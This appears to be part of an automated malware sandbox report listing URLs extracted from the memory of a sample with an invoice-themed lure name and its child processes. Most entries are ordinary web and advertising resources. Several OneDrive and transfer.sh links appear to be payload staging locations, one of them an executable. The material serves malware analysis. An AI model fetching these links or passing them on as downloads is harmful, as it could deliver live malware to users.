Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.387362891.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000002.399020407.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.405740742.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401873684.000000000120A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401655529.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000002.422082458.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000002.455045363.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.436842526.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433912633.000000000115A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433511256.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.480242227.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.467030743.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463006657.000000000300F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463367055.000000000148A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481760272.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.488827265.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481292516.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000002.504901021.0000000002F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401748327.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433671270.00000000028E6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463192812.0000000003016000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481477826.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500671413.0000000000A56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401748327.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433671270.00000000028E6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463192812.0000000003016000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481477826.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500671413.0000000000A56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355126935.000000000253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com/y4m6O4Ornh9bC3LU6E6AhRMu7htyE0P8yda7QdnFwV6RfxyvsjxNs5Be-VablD5fo4Z
Source: Shhejayly.exe, 00000012.00000002.539080976.000000000254C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com/y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3
Source: Shhejayly.exe, 0000001C.00000002.538759084.000000000252C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com/y4mohw2-jA2-enkz0nKTLzUjPRBNoO5ZAah_FcRnfkog9p26ZH43g9AnI4ZgfSnm5Rt
Source: Shhejayly.exe, 00000012.00000002.539080976.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538759084.000000000252C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com45k
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355126935.000000000253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kpf0yw.am.files.1drv.com45kT
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: aspnet_compiler.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	String found in binary or memory: https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886%21122&authkey=AKVhH87
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://pki.goog/repository/0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh
Source: dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/3GTNpY/Rtbdyyicls.bmp
Source: dwn.exe, 00000011.00000000.374284805.0000000000AE2000.00000002.00000001.01000000.00000009.sdmp, dwn.exe.12.dr, Cuhcxlcg[1].exe.12.dr	String found in binary or memory: https://transfer.sh/get/3GTNpY/Rtbdyyicls.bmp%Pvdrkkndtbbqxgmhnq
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exe
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exeY
Source: aspnet_compiler.exe, 0000000C.00000002.525361039.000000000137D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exen
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/
Source: aspnet_compiler.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
